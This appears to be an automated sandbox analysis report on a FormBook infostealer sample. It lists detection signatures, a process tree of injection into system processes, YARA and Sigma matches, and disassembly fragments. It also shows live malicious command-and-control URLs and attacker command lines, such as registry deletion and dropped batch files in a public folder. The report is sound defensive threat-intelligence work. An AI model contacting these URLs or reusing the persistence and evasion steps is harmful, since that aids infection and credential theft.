Loading ...

Play interactive tourEdit tour

Windows Analysis Report Form_TT_EUR57,890.exe

Overview

General Information

Sample Name:Form_TT_EUR57,890.exe
Analysis ID:458655
MD5:811ea41e60760a97b5f28973618728fe
SHA1:ec072cb8cb67785ca7fba45d36c6264b7eed65cd
SHA256:e6bd5f8475731bcca5f6b74327a68ee4b7fa5b0662521feff1d92424da149151
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Form_TT_EUR57,890.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\Form_TT_EUR57,890.exe' MD5: 811EA41E60760A97B5F28973618728FE)
    • logagent.exe (PID: 5784 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Fdhlajk.exe (PID: 6148 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • mshta.exe (PID: 5732 cmdline: C:\Windows\System32\mshta.exe MD5: 7083239CE743FDB68DFC933B7308E80A)
        • Fdhlajk.exe (PID: 6496 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • secinit.exe (PID: 6044 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
        • rundll32.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6324 cmdline: /c del 'C:\Windows\SysWOW64\mshta.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • autoconv.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • NETSTAT.EXE (PID: 2408 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
    • cmd.exe (PID: 1808 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2244 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6200 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\kjalhdF.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0xe98:$file: URL=
  • 0xe7c:$url_explicit: [InternetShortcut]
0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 46 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.logagent.exe.10410000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.logagent.exe.10410000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.logagent.exe.10410000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        4.2.logagent.exe.10410000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.logagent.exe.10410000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 31 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, NewProcessName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, OriginalFileName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , ProcessId: 6148
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8Avira URL Cloud: Label: malware
          Source: http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8Avira URL Cloud: Label: malware
          Source: http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeReversingLabs: Detection: 19%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Form_TT_EUR57,890.exeReversingLabs: Detection: 19%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: 4.0.logagent.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.logagent.exe.10410000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 29.2.secinit.exe.10410000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.2.mshta.exe.10410000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.0.mshta.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 29.0.secinit.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Form_TT_EUR57,890.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: Binary string: mshta.pdbGCTL source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000004.00000002.513978427.0000000004A5F000.00000040.00000001.sdmp, mshta.exe, 0000001A.00000003.468583820.0000000002D50000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: logagent.exe, mshta.exe, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: mshta.pdb source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]1_3_02C8EA30
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]1_3_02C8EA30
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov edx, dword ptr [eax]1_3_02C8EBDC
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov ebx, dword ptr [ecx]1_3_02C8EBDC
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor ecx, ecx1_3_02C8EB88
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor edx, edx1_3_02C8EB00
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then test eax, 80000000h1_3_02C8EB00
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then or edx, 00000080h1_3_02C8EB00
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then test eax, 80000000h1_3_02C8EB00
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then or edx, 02h1_3_02C8EB00
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then or edx, 01h1_3_02C8EB00
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]1_3_02C8E99C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]1_3_02C8E944
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000004h1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000000h1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 004199E0h1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor eax, eax1_3_02C8EE2C
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000004h1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000000h1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 004199E0h1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor eax, eax1_3_02C8EE24
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then test eax, 15000000h1_3_02C8EC84
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]1_3_02C8EC94
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]1_3_02C8EC94
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]1_3_02C8EC94
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]1_3_02C8EC94
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebx]1_3_02C8EC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]16_3_02CAEA30
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]16_3_02CAEA30
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]16_3_02CAEBDC
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]16_3_02CAEBDC
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx16_3_02CAEB88
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx16_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h16_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h16_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h16_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h16_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h16_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]16_3_02CAE99C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]16_3_02CAE944
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax16_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]16_3_02CAEE24
